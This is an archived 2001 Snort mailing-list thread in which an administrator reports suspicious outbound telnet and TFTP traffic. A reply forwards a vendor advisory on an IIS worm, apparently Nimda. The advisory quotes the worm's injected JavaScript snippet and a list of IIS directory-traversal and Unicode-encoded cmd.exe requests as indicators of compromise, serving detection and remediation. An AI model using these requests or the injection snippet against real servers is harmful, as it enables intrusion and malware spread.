Snort mailing list archives
RE: Need help fast!
From: Anthony Geoffron <anthonyg () passinglane com>
Date: Tue, 18 Sep 2001 20:20:55 -0700
Here is an advise from exodus.
But at this time it seems there is no information
on how to remove this virus once you get compromised.
If you guys have any information I would appreciate.
Exodus Confidential Customer Communication
Date: September 18, 2001
Title: Security Advisory - IIS Worm
Summary:
Exodus, as a professional courtesy to it's
customers, is distributing this Security Threat Advisory. As many of you
have probably experienced, there is a new and prolific worm propagating
across the Internet. The worm appears to target a large number of
well-known vulnerabilities in Microsoft Windows IIS 4 and IIS 5. In
addition to targeting Microsoft IIS web servers there is the potential that
clients operating non-Microsoft sites will experience denial of service type
effects as the worm scans for additional vulnerable hosts.
Proposed Remedy:
Microsoft patches are available at:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio
ns/security/default.asp
The worm appears to have a number of propagation
methods. Infected hosts scan their associated Class "B" address space for
additional victims; they also scan open network shares and may populate
their served web pages with a snippet of Java code that induces some
versions of Microsoft Outlook/Outlook Express to download hostile executable
"readme.exe". The code can also propagate via email with the hostile
payload bearing the name "readme.exe".
An initial analysis of the worm by the Exodus Cyber
Attack Team and others within the security community revealed the following
details.
Victim sites initiate a tftp session with the
infecting host and download "admin.dll". Once on the victim system,
admin.dll performs a number of actions to include elevating the permissions
of both the "guest" and "iuser" accounts to administrator and creating a
trojanized version of a number files to include:
c:\program files\outlook express\wabmig.exe
c:\program files\outlook express\wab.exe.
c:\program files\windows nt\pinball\pinball.exe
c:\winnt\system32\mspaint.exe.
c:\program files\outlook express\msimn.exe.
c:\program files\internet explorer\connection
wizard\isignup.exe
c:\program files\internet explorer\connection
wizard\inetwiz.exe.
c:\winnt\system32\inetsrv\inetmgr.exe.
c:\program files\internet explorer\iexplore.exe.
c:\program files\internet explorer\connection
wizard\icwconn2.exe.
c:\program files\internet explorer\connection
wizard\icwconn1.exe.
c:\program files\windows nt\dialer.exe.
c:\program files\netmeeting\conf.exe.
c:\winnt\system32\cmmgr32.exe.
The Exodus CAT Team is in the process of analyzing
these trojanized files, and additional details regarding these files will be
distributed as they are discovered.
The worm also creates a file named "readme.eml". On
at least one compromised system, the files appeared in the following
directories:
c:\Inetpub\wwwroot
c:\Program Files\Common Files\System\ado
c:\Program Files\Microsoft Script Debugger
c:\Microsoft Script Debugger\NetMeeting
c:\Winnt\Help\debug
c:\Winnt\Help\iishelp
c:\Winnt\Help\iishelp\iis
c:\Winnt\system32\inetsrv\iisadmin
A number of websites are reporting the addition of
the following snippet of code to their pages:
</body>
</html>
<html><script
language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
The readme.eml file appears to facilitate the
downloading of the hostile code by older versions of Outlook and Outlook
Express.
Until additional details about this worm are known,
Exodus is recommending that any infected host be pulled off the network.
Sites operating Microsoft IIS web servers that have
not yet been infected should be patched immediately through the most recent
Microsoft Security Advisory.
All users in your enterprise should be apprised of
the threat and notified of the
potential risk associated with any attachments
labeled "readme.exe ".
A review of the IIS logs for a targeted server may
display some or all of the following entries:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../wi
nnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET
/scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Should you have any questions, or need any
assistance please feel free to contact our Response Center at
1-877-393-7878.
Exodus does not guarantee or warrant that the
information and recommendations set forth in this advisory will enable
customers to stop the worm from propagating or operate a completely secure
or error-free Internet site. Exodus makes no warranty or guarantee as to
suitability or efficacy of any vendor supplied software patches.
Respectfully,
Exodus Communications, Inc.
"The Infrastructure for the Digital Economy"
Exodus Confidential Customer Communications
Web: <http://www.exodus.net>
-----Original Message-----
From: Sheahan, Paul (PCLN-NW) [mailto:Paul.Sheahan () priceline com]
Sent: Tuesday, September 18, 2001 4:10 PM
To: Snort List (E-mail)
Subject: [Snort-users] Need help fast!
Importance: High
Hello,
Once on Thursday I noticed an outgoing telnet connection attempt on port 23
from my web server out to the Internet. Two days later I noticed an outgoing
TFTP connection attempt (port 69) from the web same server out to the
Internet. I've never seen these type of connection attempts before and they
are definitely NOT a good sign. But even more strange is that Snort logs an
alert for these connection attempts, but does NOT log any traces! I have
never seen Snort do this before. Whenever there is an alert, there has
ALWAYS been a corresponding trace to refer to. But for each of these
connection attempts, I have nothing to refer to. I'm using Snort 1.8.1 b78
on Red Hat Linux 7.0.
My questions for the group are:
* Has anyone seen any unexplained telnet or tftp coming from any of
their servers lately? Possibly from the new w32.nimda.a.mm worm?
* Also, could this problem be a bug in Snort where it isn't logging
traces properly all of the time? It logs traces fine for all of my other
alerts.
Thanks,
Paul
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Need help fast! Sheahan, Paul (PCLN-NW) (Sep 18)
- <Possible follow-ups>
- RE: Need help fast! Anthony Geoffron (Sep 18)